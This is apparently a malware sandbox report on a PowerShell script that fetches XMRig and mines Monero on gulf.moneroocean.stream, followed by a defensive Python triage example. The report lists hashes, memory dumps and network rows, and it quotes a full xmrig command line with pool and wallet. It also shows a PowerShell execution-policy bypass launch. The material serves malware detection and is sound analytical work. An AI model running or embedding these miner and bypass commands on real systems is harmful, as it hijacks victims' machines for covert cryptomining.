"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4112 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4164 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.212.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 234.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp

Files

memory/3588-0-0x00007FF984463000-0x00007FF984465000-memory.dmp

memory/3588-1-0x00000172E7E90000-0x00000172E7EB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pko3hmyb.2v0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3588-11-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/3588-12-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/3588-13-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/3588-15-0x00000172E8240000-0x00000172E8252000-memory.dmp

memory/3588-16-0x00000172E8220000-0x00000172E822A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4468-47-0x000001E9C6880000-0x000001E9C68A0000-memory.dmp

memory/3588-48-0x00007FF984463000-0x00007FF984465000-memory.dmp

memory/3588-49-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/4468-50-0x000001E9C68D0000-0x000001E9C68F0000-memory.dmp

memory/3588-51-0x00007FF984460000-0x00007FF984F21000-memory.dmp

memory/4468-52-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-53-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-54-0x000001E9C6910000-0x000001E9C6930000-memory.dmp

memory/4468-55-0x000001E9C6930000-0x000001E9C6950000-memory.dmp

memory/4468-56-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-57-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-58-0x000001E9C6910000-0x000001E9C6930000-memory.dmp

memory/4468-59-0x000001E9C6930000-0x000001E9C6950000-memory.dmp

memory/4468-60-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-61-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-62-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-63-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-64-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-65-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-66-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-67-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-68-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-69-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-70-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-71-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-72-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-73-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-74-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-75-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-76-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-77-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-78-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-79-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-80-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-81-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-82-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-83-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-84-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-85-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-86-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-87-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-88-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-89-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-90-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-91-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-92-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-93-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-94-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-95-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-96-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-97-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-98-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-99-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-100-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-101-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-102-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-103-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-104-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-105-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-106-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-107-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-108-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-109-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-110-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-111-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-112-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-113-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-114-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-115-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-116-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-117-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

memory/4468-118-0x00007FF68AB30000-0x00007FF68B763000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-06-01 18:30

Reported

2024-06-10 16:48

Platform

win11-20240508-en

Max time kernel

1651s

Max time network

1661s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
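The two PowerShell runs above differ only in what the script reached: behavioral27 shows the full chain (powershell.exe launched with the execution policy bypassed, xmrig.exe started with a pool and a wallet, and a TCP flow to the pool host on 10128), while behavioral28 shows the launch and a DNS lookup for github.com and nothing more. The Python below is an added triage example, not part of this report or of any sandbox tooling; it splits the Windows command lines from the Processes sections, flags the execution-policy override, pulls pool host/port and wallet out of the XMRig-style arguments, checks that the wallet has the shape of a 95-character Monero address, correlates the pool host with the TCP rows of the Network table, and filters out the __PSScriptPolicyTest_*.ps1 file that PowerShell itself writes to %TEMP% to probe AppLocker/WDAC enforcement (a known artifact, not something the script dropped). The sample rows are copied from this report's behavioral27 and behavioral28 sections; the finding names and the `Finding` structure are my own.

```python
import re
from dataclasses import dataclass, field

# Standard (prefix 4) or sub-address (prefix 8) Monero address: 95 base58 chars.
MONERO_ADDR = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")
# PowerShell writes this file to %TEMP% at startup to probe AppLocker/WDAC
# script enforcement; it is created by powershell.exe, not dropped by the script.
POLICY_PROBE = re.compile(r"\\__PSScriptPolicyTest_[^\\]+\.ps1$")


@dataclass
class Finding:
    kind: str          # "powershell_policy_bypass" or "miner_cmdline" (own naming)
    cmdline: str
    detail: dict = field(default_factory=dict)


def split_cmdline(cmd: str) -> list:
    """Split a Windows command line on whitespace, keeping quoted paths intact."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def opt_value(argv, names):
    """Value of the first option in `names`, given as '-o value' or '--url=value'."""
    for i, arg in enumerate(argv):
        if arg in names and i + 1 < len(argv):
            return argv[i + 1]
        for name in names:
            if name.startswith("--") and arg.startswith(name + "="):
                return arg[len(name) + 1:]
    return None


def parse_network_rows(text: str) -> list:
    """Parse 'Country Destination Domain Proto' rows; a row may lack the domain."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dst, domain, proto = parts
        elif len(parts) == 3:            # e.g. "NL 52.142.223.178:80 tcp"
            country, dst, proto = parts
            domain = ""
        else:
            continue
        rows.append({"country": country, "dst": dst, "domain": domain, "proto": proto})
    return rows


def is_powershell_policy_probe(path: str) -> bool:
    """True for the __PSScriptPolicyTest_*.ps1 artifact, which is not an IoC."""
    return bool(POLICY_PROBE.search(path))


def triage_run(cmdlines, network_text):
    """Findings for one detonation: policy bypass plus miner indicators."""
    connections = parse_network_rows(network_text)
    findings = []
    for cmd in cmdlines:
        argv = split_cmdline(cmd)
        if not argv:
            continue
        exe = argv[0].rsplit("\\", 1)[-1].lower()
        low = [a.lower() for a in argv]
        # T1059.001: powershell.exe -ExecutionPolicy bypass (and accepted abbreviations)
        if exe == "powershell.exe":
            for i in range(len(low) - 1):
                if low[i] in ("-executionpolicy", "-exec", "-ep") and low[i + 1] in ("bypass", "unrestricted"):
                    findings.append(Finding("powershell_policy_bypass", cmd, {"policy": low[i + 1]}))
        # XMRig-style arguments: -o/--url <pool[:port]> and -u/--user <wallet>
        pool = opt_value(argv, ("-o", "--url"))
        user = opt_value(argv, ("-u", "--user"))
        if pool and user:
            host, _, port = pool.split("://")[-1].rpartition(":")
            if not host:                  # pool given without an explicit port
                host, port = port, ""
            findings.append(Finding("miner_cmdline", cmd, {
                "pool_host": host,
                "pool_port": int(port) if port.isdigit() else None,
                "wallet": user,
                "wallet_is_monero": bool(MONERO_ADDR.match(user)),
                # TCP flows in the report whose resolved domain is the pool host
                "connections": [c for c in connections
                                if c["proto"] == "tcp" and c["domain"] == host],
            }))
    return findings


# Rows copied from the report (behavioral27: full chain; behavioral28: launch only).
B27_PROCESSES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"',
    r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 '
    r'-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF',
]
B27_NETWORK = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
NL 52.142.223.178:80 tcp
"""
B28_PROCESSES = [
    r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"',
]
B28_NETWORK = "US 8.8.8.8:53 github.com udp\n"

if __name__ == "__main__":
    for label, procs, net in (("behavioral27", B27_PROCESSES, B27_NETWORK),
                              ("behavioral28", B28_PROCESSES, B28_NETWORK)):
        for f in triage_run(procs, net):
            print(label, f.kind, f.detail)
```

Run against behavioral27 it yields the policy-bypass finding plus a miner finding with pool host gulf.moneroocean.stream, port 10128, a wallet that passes the Monero address check, and the single matching flow DE 149.102.143.109:10128; against behavioral28 only the policy-bypass finding, which is the whole story that run tells. The network correlation keys on the resolved domain rather than the IP, so the same code still matches if a later detonation resolves the pool to a different address.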

Files

memory/3876-0-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pgpwoh3e.tsx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3876-9-0x0000018DB7680000-0x0000018DB76A2000-memory.dmp

memory/3876-10-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp

memory/3876-11-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp

memory/3876-12-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp

memory/3876-13-0x00007FFC626A3000-0x00007FFC626A5000-memory.dmp

memory/3876-14-0x00007FFC626A0000-0x00007FFC63162000-memory.dmp